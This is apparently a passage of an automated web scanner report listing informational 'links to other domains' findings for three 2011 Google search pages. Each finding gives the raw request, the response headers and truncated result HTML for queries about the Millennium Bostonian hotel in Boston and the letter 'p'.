<h3 class="r"><a href="http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/" class=l onmousedown="return clk(this.href,'','','','13','','0CJUBEBYwDA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MZVl6Tm27rwJ:www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/+millenium+boston&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CJoBECAwDA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milleniumdental.net/" class=l onmousedown="return clk(this.href,'','','','14','','0CJwBEBYwDQ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:lcu5kWLyNDEJ:www.milleniumdental.net/+millenium+boston&cd=14&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','14','','0CKEBECAwDQ')">Cached</a>
...[SNIP]...
<td valign=top style="padding:5px 10px 0 0"><a href="http://www.youtube.com/watch?v=zphTL6asEcc" class=l onmousedown="return clk(this.href,'','14886740032398037447','','15','','0CKMBELcCMA4')"><em>
...[SNIP]...
<td valign=top style="padding:5px 10px 0 0"><a href="http://www.youtube.com/watch?v=iHkBLYEKQ-w" class=l onmousedown="return clk(this.href,'','9833892556290278380','','16','','0CKkBELcCMA8')">04-Backstreet Boys Live in <em>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Millennium_Place" class=l onmousedown="return clk(this.href,'','','','17','','0CLEBEBYwEA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:LdrDMcGpc-0J:en.wikipedia.org/wiki/Millennium_Place+millenium+boston&cd=17&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','17','','0CLYBECAwEA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mill-im.com/" class=l onmousedown="return clk(this.href,'','','','18','','0CLgBEBYwEQ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MZCRUYsHAAMJ:www.mill-im.com/+millenium+boston&cd=18&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','18','','0CL0BECAwEQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.orbitz.com/hotel/United_States--MA/Boston/Millennium_Bostonian_Hotel_Boston/" class=l onmousedown="return clk(this.href,'','','','19','','0CL8BEBYwEg')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NGLhWghEPy0J:www.orbitz.com/hotel/United_States--MA/Boston/Millennium_Bostonian_Hotel_Boston/+millenium+boston&cd=19&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','19','','0CMcBECAwEg')">Cached</a>
...[SNIP]...

17.269. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=vid:1&source=og&sa=N&tab=wv

The response contains the following links to other domains:

http://img.youtube.com/vi/BR4yQFZK9YM/default.jpg
http://img.youtube.com/vi/FJfFZqTlWrQ/default.jpg
http://img.youtube.com/vi/P-AYAv0IoWI/default.jpg
http://img.youtube.com/vi/RCSXMMF430w/default.jpg
http://img.youtube.com/vi/eocCPDxKq1o/default.jpg
http://vimeo.com/7743200
http://www.pp2g.tv/va396YnI_.aspx
http://www.southparkstudios.com/clips/185672
http://www.spike.com/video/978359
http://www.thedailyshow.com/watch/thu-may-14-2009/intro---p-is-for-protection
http://www.youtube.com/results?hl=en&q=p&um=1&ie=UTF-8&sa=N&tab=v1
http://www.youtube.com/watch?v=BR4yQFZK9YM
http://www.youtube.com/watch?v=FJfFZqTlWrQ
http://www.youtube.com/watch?v=P-AYAv0IoWI
http://www.youtube.com/watch?v=RCSXMMF430w
http://www.youtube.com/watch?v=eocCPDxKq1o

Request

GET /search?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=vid:1&source=og&sa=N&tab=wv HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:48:32 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>p - Google Search</title><script>window.google={kEI:"0HxJTYWCFoT6lwfGn5AB",kEXPI:"17259,17291,27615,27683,2
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=p&um=1&ie=UTF-8&sa=N&tab=v1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a id="v1483871646885698228" href="/url?q=http://www.youtube.com/watch%3Fv%3DFJfFZqTlWrQ&sa=X&ei=0HxJTYWCFoT6lwfGn5AB&ved=0CDEQuAIwAA&usg=AFQjCNHCBZE8HngimwrMjNCQKI2j2TNMSQ" ><img src="http://img.youtube.com/vi/FJfFZqTlWrQ/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb1 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=FJfFZqTlWrQ" class=l onmousedown="return clk(this.href,'','1483871646885698228','','1','','0CDAQtwIwAA')"><em>
...[SNIP]...
<a id="v368787471398008195" href="/url?q=http://www.youtube.com/watch%3Fv%3DBR4yQFZK9YM&sa=X&ei=0HxJTYWCFoT6lwfGn5AB&ved=0CDUQuAIwAQ&usg=AFQjCNEauvAqQz_9jpkHK9RheKaWJ71pGg" ><img src="http://img.youtube.com/vi/BR4yQFZK9YM/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb2 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=BR4yQFZK9YM" class=l onmousedown="return clk(this.href,'','368787471398008195','','2','','0CDQQtwIwAQ')"><em>
...[SNIP]...
<a id="v8829028052215966554" href="/url?q=http://www.youtube.com/watch%3Fv%3DeocCPDxKq1o&sa=X&ei=0HxJTYWCFoT6lwfGn5AB&ved=0CDkQuAIwAg&usg=AFQjCNEL2H_ESQzRGMKp7rdFbtvrsqJ_CA" ><img src="http://img.youtube.com/vi/eocCPDxKq1o/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=eocCPDxKq1o" class=l onmousedown="return clk(this.href,'','8829028052215966554','','3','','0CDgQtwIwAg')"><em>
...[SNIP]...
<a id="v4602705220286849378" href="/url?q=http://www.youtube.com/watch%3Fv%3DP-AYAv0IoWI&sa=X&ei=0HxJTYWCFoT6lwfGn5AB&ved=0CD0QuAIwAw&usg=AFQjCNEw2biyoEU87TNFpSQBjfEiYlwtSQ" ><img src="http://img.youtube.com/vi/P-AYAv0IoWI/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb4 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=P-AYAv0IoWI" class=l onmousedown="return clk(this.href,'','4602705220286849378','','4','','0CDwQtwIwAw')">Sweet Child O' Mine Music Video</a>
...[SNIP]...
<h3 class=r><a href="http://www.spike.com/video/978359" class=l onmousedown="return clk(this.href,'','4121787078203026266','','5','','0CEAQtwIwBA')">A & <em>
...[SNIP]...
<h3 class=r><a href="http://www.pp2g.tv/va396YnI_.aspx" class=l onmousedown="return clk(this.href,'','6939374973119908691','','6','','0CEQQtwIwBQ')">Pleasure <em>
...[SNIP]...
<h3 class=r><a href="http://vimeo.com/7743200" class=l onmousedown="return clk(this.href,'','11786434714553041377','','7','','0CEgQtwIwBg')" title="The Horsemen P-51 Mustang Flying Legends Duxford 2009">The Horsemen <em>
...[SNIP]...
<h3 class=r><a href="http://www.thedailyshow.com/watch/thu-may-14-2009/intro---p-is-for-protection" class=l onmousedown="return clk(this.href,'','9981952379210933981','','8','','0CEwQtwIwBw')">The Daily Show - 5/14/2009 - Intro - <em>
...[SNIP]...
<a id="v4910215729400831820" href="/url?q=http://www.youtube.com/watch%3Fv%3DRCSXMMF430w&sa=X&ei=0HxJTYWCFoT6lwfGn5AB&ved=0CFEQuAIwCA&usg=AFQjCNGibm2JTNw-t1DNI036_AHUgrpv9A" ><img src="http://img.youtube.com/vi/RCSXMMF430w/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb9 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=RCSXMMF430w" class=l onmousedown="return clk(this.href,'','4910215729400831820','','9','','0CFAQtwIwCA')">El-<em>
...[SNIP]...
<h3 class=r><a href="http://www.southparkstudios.com/clips/185672" class=l onmousedown="return clk(this.href,'','4198850822176723815','','10','','0CFQQtwIwCQ')" title="P. Diddy's Ditty (Season 8, Episode 8) - Video Clips - ..."><em>
...[SNIP]...

17.270. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=+site:millenniumhotels.com+millenium+boston&sa=X&ei=_CVITc2VBYOClAeFy82iBA&ved=0CD4QrAM

The response contains the following links to other domains:

http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+site:millenniumhotels.com+millenium+boston&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:9ddoS6gbbIAJ:www.millenniumhotels.com/destinations/abt_boston.html+site:millenniumhotels.com+millenium+boston&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:BL2UXDHjun8J:www.millenniumhotels.com/millenniumboston/specials/index.html+site:millenniumhotels.com+millenium+boston&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:GxQ2xYSGtTAJ:www.millenniumhotels.com/millenniumboston/meeting/weddings.html+site:millenniumhotels.com+millenium+boston&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Hkvj_6Y1cMQJ:www.millenniumhotels.com/millenniumboston/restaurant/+site:millenniumhotels.com+millenium+boston&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Pa3PKC-iHMsJ:www.millenniumhotels.com/millenniumboston/Bostonianppc/index.html%3Fs_kwcid%3DTC%257C5371%257Cbostonian%2520millenium%2520hotel%257C%257CS%257C%257C4128801514+site:millenniumhotels.com+millenium+boston&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:T-ZKOZtN5skJ:www.millenniumhotels.com/millenniumboston/attractions/+site:millenniumhotels.com+millenium+boston&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Y5bZUctNLP4J:www.millenniumhotels.com/millenniumboston/whatshot/Holiday_Party_Events.html+site:millenniumhotels.com+millenium+boston&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ZVFH4I2w8wsJ:www.millenniumhotels.com/millenniumboston/rooms/+site:millenniumhotels.com+millenium+boston&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:lJ9KBZ0WDvcJ:www.millenniumhotels.com/millenniumboston/attractions/Logan_International_Airport.html+site:millenniumhotels.com+millenium+boston&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.millenniumhotels.com/destinations/abt_boston.html
http://www.millenniumhotels.com/millenniumboston/Bostonianppc/index.html?s_kwcid=TC%7C5371%7Cbostonian%20millenium%20hotel%7C%7CS%7C%7C4128801514
http://www.millenniumhotels.com/millenniumboston/attractions/
http://www.millenniumhotels.com/millenniumboston/attractions/Logan_International_Airport.html
http://www.millenniumhotels.com/millenniumboston/index.html
http://www.millenniumhotels.com/millenniumboston/meeting/weddings.html
http://www.millenniumhotels.com/millenniumboston/restaurant/
http://www.millenniumhotels.com/millenniumboston/rooms/
http://www.millenniumhotels.com/millenniumboston/specials/index.html
http://www.millenniumhotels.com/millenniumboston/whatshot/Holiday_Party_Events.html
http://www.youtube.com/results?hl=en&q=site:millenniumhotels.com+millenium+boston&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /search?hl=en&q=+site:millenniumhotels.com+millenium+boston&sa=X&ei=_CVITc2VBYOClAeFy82iBA&ved=0CD4QrAM HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:48:04 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>site:millenniumhotels.com millenium boston - Google Search</title><script>window.google={kEI:"tHxJTdK9NYGgl
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=site:millenniumhotels.com+millenium+boston&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/index.html" class=l onmousedown="return clk(this.href,'','','','1','','0CBcQFjAA')">Downtown <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+site:millenniumhotels.com+millenium+boston&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBkQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/specials/index.html" class=l onmousedown="return clk(this.href,'','','','2','','0CBoQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BL2UXDHjun8J:www.millenniumhotels.com/millenniumboston/specials/index.html+site:millenniumhotels.com+millenium+boston&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CBwQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/restaurant/" class=l onmousedown="return clk(this.href,'','','','3','','0CB0QFjAC')">North 26 Restaurant & Bar - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Hkvj_6Y1cMQJ:www.millenniumhotels.com/millenniumboston/restaurant/+site:millenniumhotels.com+millenium+boston&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CB8QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/Bostonianppc/index.html?s_kwcid=TC%7C5371%7Cbostonian%20millenium%20hotel%7C%7CS%7C%7C4128801514" class=l onmousedown="return clk('http://www.millenniumhotels.com/millenniumboston/Bostonianppc/index.html?s_kwcid=TC%7C5371%7Cbostonian%20millenium%20hotel%7C%7CS%7C%7C4128801514','','','','4','','0CCEQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Pa3PKC-iHMsJ:www.millenniumhotels.com/millenniumboston/Bostonianppc/index.html%3Fs_kwcid%3DTC%257C5371%257Cbostonian%2520millenium%2520hotel%257C%257CS%257C%257C4128801514+site:millenniumhotels.com+millenium+boston&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Pa3PKC-iHMsJ:www.millenniumhotels.com/millenniumboston/Bostonianppc/index.html%3Fs_kwcid%3DTC%257C5371%257Cbostonian%2520millenium%2520hotel%257C%257CS%257C%257C4128801514+site:millenniumhotels.com+millenium+boston&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com','','','','4','','0CCMQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/attractions/" class=l onmousedown="return clk(this.href,'','','','5','','0CCQQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:T-ZKOZtN5skJ:www.millenniumhotels.com/millenniumboston/attractions/+site:millenniumhotels.com+millenium+boston&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CCYQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/rooms/" class=l onmousedown="return clk(this.href,'','','','6','','0CCcQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZVFH4I2w8wsJ:www.millenniumhotels.com/millenniumboston/rooms/+site:millenniumhotels.com+millenium+boston&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CCkQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/whatshot/Holiday_Party_Events.html" class=l onmousedown="return clk(this.href,'','','','7','','0CCoQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Y5bZUctNLP4J:www.millenniumhotels.com/millenniumboston/whatshot/Holiday_Party_Events.html+site:millenniumhotels.com+millenium+boston&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CCwQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/attractions/Logan_International_Airport.html" class=l onmousedown="return clk(this.href,'','','','8','','0CC0QFjAH')">Hotels near Logan Airport <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:lJ9KBZ0WDvcJ:www.millenniumhotels.com/millenniumboston/attractions/Logan_International_Airport.html+site:millenniumhotels.com+millenium+boston&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CC8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/destinations/abt_boston.html" class=l onmousedown="return clk(this.href,'','','','9','','0CDAQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9ddoS6gbbIAJ:www.millenniumhotels.com/destinations/abt_boston.html+site:millenniumhotels.com+millenium+boston&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CDIQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/meeting/weddings.html" class=l onmousedown="return clk(this.href,'','','','10','','0CDQQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:GxQ2xYSGtTAJ:www.millenniumhotels.com/millenniumboston/meeting/weddings.html+site:millenniumhotels.com+millenium+boston&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CDYQIDAJ')">Cached</a>
...[SNIP]...

17.271. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=millenium+boston&hl=en&prmd=ivnscm&tbo=1

The response contains the following links to other domains:

http://en.wikipedia.org/wiki/Millennium_Place
http://img.youtube.com/vi/iHkBLYEKQ-w/default.jpg?h=60&w=80&sigh=__sM81olyQYHqMjdBtsVanoARVtf8=
http://img.youtube.com/vi/zphTL6asEcc/default.jpg?h=60&w=80&sigh=___EvKb_9iWZZWaS_p66vlKVYToNc=
http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+millenium+boston&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:BL2UXDHjun8J:www.millenniumhotels.com/millenniumboston/specials/index.html+millenium+boston&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:LdrDMcGpc-0J:en.wikipedia.org/wiki/Millennium_Place+millenium+boston&cd=17&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:MZCRUYsHAAMJ:www.mill-im.com/+millenium+boston&cd=18&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:MZVl6Tm27rwJ:www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/+millenium+boston&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:MzOkyzIz36sJ:www.millenniumdaycare.com/+millenium+boston&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:NGLhWghEPy0J:www.orbitz.com/hotel/United_States--MA/Boston/Millennium_Bostonian_Hotel_Boston/+millenium+boston&cd=19&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Xle3EKG2cb4J:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:bmUY5UzYdb4J:www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html+millenium+boston&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:lcu5kWLyNDEJ:www.milleniumdental.net/+millenium+boston&cd=14&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/
http://www.mill-im.com/
http://www.milleniumdental.net/
http://www.millenniumdaycare.com/
http://www.millenniumhotels.com/millenniumboston/attractions/
http://www.millenniumhotels.com/millenniumboston/facilities/
http://www.millenniumhotels.com/millenniumboston/gallery/index.html
http://www.millenniumhotels.com/millenniumboston/index.html
http://www.millenniumhotels.com/millenniumboston/restaurant/
http://www.millenniumhotels.com/millenniumboston/rooms/
http://www.millenniumhotels.com/millenniumboston/specials/index.html
http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html
http://www.millenniumhotels.com/millenniumboston/whatshot/Holiday_Party_Events.html
http://www.orbitz.com/hotel/United_States--MA/Boston/Millennium_Bostonian_Hotel_Boston/
http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html
http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html
http://www.youtube.com/results?q=millenium+boston&hl=en&prmd=ivnscm&um=1&ie=UTF-8&sa=N&tab=w1
http://www.youtube.com/watch?v=iHkBLYEKQ-w
http://www.youtube.com/watch?v=zphTL6asEcc

Request

GET /search?q=millenium+boston&hl=en&prmd=ivnscm&tbo=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:48:29 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>millenium boston - Google Search</title><script>window.google={kEI:"zXxJTYiFN8KAlAfxr7nrDw",kEXPI:"17259,17
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&hl=en&prmd=ivnscm&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/index.html" class=l onmousedown="return clk(this.href,'','','','1','','0CDsQFjAA')">Downtown <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+millenium+boston&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CD0QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/specials/index.html" onmousedown="return clk(this.href,'','','','1','','0CD4QqwMoADAA')">Specials & Packages</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/restaurant/" onmousedown="return clk(this.href,'','','','1','','0CD8QqwMoATAA')">Restaurants & Bars</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/rooms/" onmousedown="return clk(this.href,'','','','1','','0CEAQqwMoAjAA')">Guest Rooms</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/gallery/index.html" onmousedown="return clk(this.href,'','','','1','','0CEEQqwMoAzAA')">Take a Picture Gallery Tour</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/attractions/" onmousedown="return clk(this.href,'','','','1','','0CEIQqwMoBDAA')">Location & Attractions</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/facilities/" onmousedown="return clk(this.href,'','','','1','','0CEMQqwMoBTAA')">Facilities</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html" onmousedown="return clk(this.href,'','','','1','','0CEQQqwMoBjAA')">Bed & Breakfast Package</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/whatshot/Holiday_Party_Events.html" onmousedown="return clk(this.href,'','','','1','','0CEUQqwMoBzAA')">Banquets & Meetings</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/specials/index.html" class=l onmousedown="return clk(this.href,'','','','2','','0CEgQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BL2UXDHjun8J:www.millenniumhotels.com/millenniumboston/specials/index.html+millenium+boston&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CEoQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html" class=l onmousedown="return clk(this.href,'','','','3','','0CEwQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Xle3EKG2cb4J:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CE8QIDAC')">Cached</a>
...[SNIP]...
